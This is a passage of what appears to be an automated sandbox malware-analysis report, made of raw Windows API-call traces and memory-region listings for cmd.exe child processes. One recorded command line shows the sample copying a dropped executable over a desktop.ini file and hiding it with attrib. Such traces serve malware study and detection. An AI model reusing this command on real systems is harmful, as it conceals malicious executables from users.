hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] GetFileType (hFile=0x4c) returned 0x1 [0212.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.056] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.056] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.056] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] GetFileType (hFile=0x4c) returned 0x1 [0212.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.058] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.058] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, 
lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.058] GetFileType (hFile=0x4c) returned 0x1 [0212.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.059] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.059] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x200, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af270*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af270*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af2c0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.059] GetFileType (hFile=0x4c) returned 0x1 [0212.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af310*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af310*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.060] GetFileType (hFile=0x4c) returned 0x1 [0212.060] _get_osfhandle (_FileHandle=1) returned 
0x4c [0212.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af360*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.104] GetFileType (hFile=0x4c) returned 0x1 [0212.104] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.104] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af3b0*, lpNumberOfBytesWritten=0x2ae404*=0x50, lpOverlapped=0x0) returned 1 [0212.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.105] GetFileType (hFile=0x4c) returned 0x1 [0212.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.105] WriteFile (in: hFile=0x4c, lpBuffer=0x2af400*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af400*, lpNumberOfBytesWritten=0x2ae404*=0x20, lpOverlapped=0x0) returned 1 [0212.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.105] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.105] ReadFile (in: hFile=0x54, lpBuffer=0x2af220, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae410, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesRead=0x2ae410*=0x32, lpOverlapped=0x0) returned 1 [0212.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.105] GetFileType (hFile=0x4c) returned 0x1 [0212.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.105] GetFileType (hFile=0x4c) returned 0x1 [0212.105] _get_osfhandle (_FileHandle=1) returned 0x4c [0212.105] WriteFile (in: hFile=0x4c, lpBuffer=0x2af220*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x2ae404, lpOverlapped=0x0 | out: lpBuffer=0x2af220*, lpNumberOfBytesWritten=0x2ae404*=0x32, lpOverlapped=0x0) 
returned 1 [0212.105] _get_osfhandle (_FileHandle=4) returned 0x54 [0212.105] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3f0 | out: lpNewFilePointer=0x0) returned 1 [0212.105] _close (_FileHandle=4) returned 0 [0212.105] FindNextFileW (in: hFindFile=0x360e78, lpFindFileData=0x2af484 | out: lpFindFileData=0x2af484) returned 0 [0212.106] GetLastError () returned 0x12 [0212.106] FindClose (in: hFindFile=0x360e78 | out: hFindFile=0x360e78) returned 1 [0212.106] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0212.106] _close (_FileHandle=3) returned 0 [0212.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.107] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0212.107] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.107] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0212.107] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.107] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0212.107] SetConsoleInputExeNameW () returned 0x1 [0212.107] GetConsoleOutputCP () returned 0x1b5 [0212.107] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.107] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.107] exit (_Code=0) Process: id = "520" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16940" os_pid = "0xa50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\desktop.ini\" && 
attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31204 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31205 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31206 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31207 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 31208 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31209 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31210 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31211 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31212 start_va = 0x7ffd5000 
end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 31213 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31262 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31263 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31264 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31265 start_va = 0xf0000 end_va = 0xfffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31266 start_va = 0x440000 end_va = 0x53ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 31267 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31268 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31269 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31270 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 31271 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31272 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31273 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31274 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31275 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31276 start_va = 0x100000 end_va = 0x1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 31277 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31278 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31279 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31280 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" 
filename = "" Region: id = 31281 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31282 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 31283 start_va = 0x2f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 31284 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 31285 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Region: id = 31286 start_va = 0x12b0000 end_va = 0x157efff entry_point = 0x12b0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 721 os_tid = 0x310 [0212.710] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa8c | out: lpSystemTimeAsFileTime=0x2efa8c*(dwLowDateTime=0xb397fcc0, dwHighDateTime=0x1d440a9)) [0212.710] GetCurrentProcessId () returned 0xa50 [0212.710] GetCurrentThreadId () returned 0x310 [0212.710] GetTickCount () returned 0x3ba39 [0212.710] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa84 | out: lpPerformanceCount=0x2efa84*=26949915509) returned 1 [0212.710] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0212.710] __set_app_type (_Type=0x1) [0212.711] __p__fmode () returned 0x76b331f4 [0212.711] __p__commode () returned 0x76b331fc [0212.711] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0212.711] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0212.711] 
GetCurrentThreadId () returned 0x310 [0212.711] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x310) returned 0x38 [0212.711] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0212.711] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0212.711] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.711] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efa1c | out: phkResult=0x2efa1c*=0x0) returned 0x2 [0212.712] VirtualQuery (in: lpAddress=0x2efa53, lpBuffer=0x2ef9ec, dwLength=0x1c | out: lpBuffer=0x2ef9ec*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.712] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef9ec, dwLength=0x1c | out: lpBuffer=0x2ef9ec*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0212.712] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef9ec, dwLength=0x1c | out: lpBuffer=0x2ef9ec*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0212.712] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef9ec, dwLength=0x1c | out: lpBuffer=0x2ef9ec*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0212.712] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef9ec, dwLength=0x1c | out: lpBuffer=0x2ef9ec*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0212.712] 
GetConsoleOutputCP () returned 0x1b5 [0212.712] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0212.712] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0212.712] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.712] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0212.712] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.712] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0212.712] _get_osfhandle (_FileHandle=1) returned 0x7 [0212.712] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0212.712] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.712] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0212.713] _get_osfhandle (_FileHandle=0) returned 0x3 [0212.713] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0212.713] GetEnvironmentStringsW () returned 0x4504a0* [0212.713] FreeEnvironmentStringsW (penv=0x4504a0) returned 1 [0212.713] GetEnvironmentStringsW () returned 0x4504a0* [0212.713] FreeEnvironmentStringsW (penv=0x4504a0) returned 1 [0212.713] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee98c | out: phkResult=0x2ee98c*=0x40) returned 0x0 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x0, lpData=0x2ee998*=0x50, lpcbData=0x2ee990*=0x1000) returned 0x2 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: lpType=0x2ee994*=0x4, lpData=0x2ee998*=0x1, lpcbData=0x2ee990*=0x4) returned 0x0 [0212.713] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee994, lpData=0x2ee998, lpcbData=0x2ee990*=0x1000 | out: 
